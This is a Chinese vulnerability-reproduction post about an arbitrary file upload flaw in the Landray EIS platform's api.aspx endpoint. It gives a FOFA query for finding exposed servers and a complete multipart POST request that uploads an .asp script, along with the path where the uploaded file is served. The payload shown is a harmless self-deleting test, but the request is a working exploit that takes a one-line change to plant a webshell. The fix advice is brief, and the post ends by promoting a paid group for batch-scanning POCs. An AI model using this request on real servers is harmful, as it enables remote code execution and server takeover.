【漏洞复现】蓝凌EIS智慧协同平台 api.aspx接口处存在任意文件上传漏洞

                            免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

蓝凌EIS是一款全面的企业管理软件，以知识管理为核心，致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程，蓝凌EIS能够满足企业的个性化需求。同时，简单的界面和操作方式使得员工能够快速上手使用。蓝凌EIS还注重知识管理，提供知识模板和知识库等功能，方便员工进行知识分享和学习。此外，蓝凌EIS还提供丰富的API接口，可以与第三方系统集成，实现数据共享和交换。对于高速成长型企业和中小型企业来说，蓝凌EIS是一款非常适用的企业管理软件。

蓝凌EIS api.aspx接口处存在任意文件上传漏洞，恶意攻击者可以上传恶意软件，例如后门、木马或勒索软件，以获取对服务器的远程访问权限或者破坏系统，对服务器造成极大的安全隐患。

Ⅱ、fofa语句

body="/Scripts/jquery.landray.dialog.js"

Ⅲ、漏洞复现

1、发送数据包上传文件

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 152
Content-Type: multipart/form-data; boundary=---4362487482487434839348798
Connection: close
 
-----4362487482487434839348798
Content-Disposition: form-data; name="file"; filename="ceshi.asp"
Content-Type: text/html
 
<%
response.write("Hello World!")
Dim currentPath
currentPath = Request.ServerVariables("PATH_TRANSLATED")
Set CR = Server.CreateObject("Scripting.FileSystemObject")
CR.DeleteFile(currentPath)
Set CR = Nothing
%>
-----4362487482487434839348798--

2、访问上传文件

http://127.0.0.1/files/editor_img/20240603093202550418/20240603093202550418.asp

Ⅳ、Nuclei-POC

Ⅴ、修复建议

1、仅允许访问预先批准的文件路径，并拒绝所有其他路径；

2、仔细验证用户请求的文件路径，确保它指向允许访问的文件；

3、及时应用安全更新和补丁，以修复任何已发现的漏洞。

漏洞详情及批量检测POC请前往圈子获取 

 圈子名称：ONEPIECE

交流群